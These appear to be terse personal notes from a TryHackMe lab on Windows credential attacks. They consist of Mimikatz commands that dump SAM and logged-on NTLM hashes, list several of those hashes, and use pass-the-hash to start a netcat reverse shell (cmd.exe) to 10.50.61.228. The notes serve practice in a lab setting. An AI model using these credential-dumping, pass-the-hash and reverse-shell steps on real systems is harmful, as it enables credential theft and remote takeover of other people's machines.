mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # lsadump::sam   
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 145e02c50333951f71d13c245d352b50

        

ntlm hash for admin in thm: 0b2571be7e75e3dbd169ca5352a2dad7


mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # sekurlsa::msv ----for other users 

t1_toby.back5: 533f1bd576caa912bdb9da284bbc60fe 

any command run from here will actually use the credentials we injected using PtH.


sekurlsa::pth /user:t1_toby.back5 /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe 10.50.61.228 9999"
